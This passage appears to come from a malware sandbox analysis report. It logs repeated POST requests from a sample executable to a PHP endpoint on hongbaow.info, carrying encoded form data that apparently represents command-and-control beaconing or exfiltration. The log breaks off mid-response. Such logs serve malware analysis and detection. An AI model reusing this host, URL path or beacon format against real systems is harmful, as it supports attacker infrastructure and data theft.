                                      2025-01-22 07:42:38 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:38 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JtNkovn%2FuB8782c1j2xPKDA%2FZPDG0cAdI8qMeCHXs4c%2FOLFvIlAOhXiKtBJwYsZ5oyxQdZnTNKAb0YtojRuOIVUXcLvmWYx9HMimAHapJCNEludJx4czeLoTjlZjhenA"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8910a338ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1766&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1603514&cwnd=162&unsent_bytes=0&cid=e26a7af0cc7f904c&ts=320&x=0"
                                      2025-01-22 07:42:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.455916104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:39 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:39 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:40 UTC806INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaX7FhDuYCGl4pAUg%2BDsFzeeLVut4sR2Sq3wVBdDW4a0GNnVQI5ukRTqkNnjGhrjT0IlvJbv9Jc%2F4hwr6MsyWN0gKPEm9P8rwODudHZlgRkFi9znxTE9oBhbiU4n8alW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de89b2e21f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1458&rtt_var=563&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1917268&cwnd=107&unsent_bytes=0&cid=e3d9f4e2018c7f49&ts=324&x=0"
                                      2025-01-22 07:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.455932104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:41 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:41 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:42 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCRmQW%2BfsUc5P7R%2FM%2BFyW0ekTi8i4DIrFO2bSi0tWpLI17TwSrqoy4Ieb499il9ZcqtbiMSP2jC8xKF3bG0FIlGiS91wjMBONMM%2BOhYi0Ciau2DM2uOzdUAoSGZF2L8d"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8a8ee77f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1468&rtt_var=556&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1955793&cwnd=107&unsent_bytes=0&cid=21b7847167c0c704&ts=333&x=0"
                                      2025-01-22 07:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.455953104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:45 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:45 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:45 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3dUPdkXOwHHQ1U6%2FkRUIODDLxFWQn8O3HRMVE%2Fnj1biExPgOK1pBgD466bRPShGXvnTe6ib3mgW7AoLN1lkmGTkbVFp2PV2HZXCTjkVBpFhdDRsmGB%2B8IDvLsvTZ%2F0y"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8bf7f3142eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1573&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1827284&cwnd=215&unsent_bytes=0&cid=32948bd919abd0f6&ts=354&x=0"
                                      2025-01-22 07:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.455959104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:45 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:45 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:46 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yunCui4aijJA8%2Fg8OoXo2p3by37pwnLV0B7nZm8DrMXGRQ%2BRnZghoNObYU164WBJNdjw3QZRAJkh2leZkA9Dye0WPFkD5RUYrAf61b%2FOA0jTlPdYW%2F7MQDrU3KxcYy9D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8c0a89ff5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1474&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1981004&cwnd=107&unsent_bytes=0&cid=0ed101861375fb6f&ts=332&x=0"
                                      2025-01-22 07:42:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.455986104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:49 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:49 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:49 UTC813INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxHZgqS8UmwgvP%2B2xmv565FC5PY1KdGoq0wtl2SbvuicNmFWrecR%2FXbFf1Dy%2Bwq3jRBNiIoZusuooqI2cEdCiJR5cQHEOK%2BcugEWe%2FyEkyTZWxNWo35xlOtwYaYNGd8F"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8d86e5f8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1779&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1618625&cwnd=162&unsent_bytes=0&cid=3a781ceaf4d0c760&ts=327&x=0"
                                      2025-01-22 07:42:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.455997104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:51 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:51 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:51 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gcmTfA8zfYTfR2%2FSkkHzZH3tPYqA5HRvOqdIOCtZC9cA9lHyj7Z7va7bd6J9nkSvPKD8r4vAXECUqGsiJ0i4pqdqo165VlTSKSrN8%2Bzf5fQy%2BidF09VGrDUR%2BAk1DXF1"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8e439a18ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1610590&cwnd=162&unsent_bytes=0&cid=66d4d2b396b54a91&ts=327&x=0"
                                      2025-01-22 07:42:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.456011104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:53 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:53 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:53 UTC813INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CP%2BGeSmFmAgf%2FYU0sgeoNpyarrmLjywq6OSuiID%2Fg1cPIPD8lWKUP3T%2BsiWKsUHdxv74B5wgdxSMP2iccKnlWi0NhixKk9MP3%2BuL%2BKvokJ7EDNI0publCMuA19wG6obF"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8f01bd7f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1425&rtt_var=551&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1954484&cwnd=107&unsent_bytes=0&cid=912c4af7d1f3c56f&ts=309&x=0"
                                      2025-01-22 07:42:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.456034104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:57 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:57 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:57 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGtEI7ETi%2B%2BWmQAsJIlDj8MQcjtrF2LYKf1xxQ5uCTUMlTquxhj1jEOkVr0qapuYGbA3Yb8BFIgBimJLfaECsvXnfQaRsYScpmwtNolBraIFxo5panaqGZ5eYo4l2t0Q"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de907eabf8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1785&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1592148&cwnd=162&unsent_bytes=0&cid=205c6f8fd2aa0729&ts=346&x=0"
                                      2025-01-22 07:42:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.456038104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:57 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:57 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:57 UTC816INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YVsxZLo3qVISrUw%2F0bhK%2FMFEisxIO4E%2FM7yCOAHPtpKv8HftHGWFrCDu1%2BJqy2fo0i033uFoUZhg4kfRPBPrIR4SUV0yUBs3%2BNCCP3K7bwVvPu3AgxQMz3Y%2B4hbt%2FpPl"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de908acc142eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1600&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1825000&cwnd=215&unsent_bytes=0&cid=91e187f9658eb462&ts=328&x=0"
                                      2025-01-22 07:42:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.456061104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:00 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:00 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:01 UTC813INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
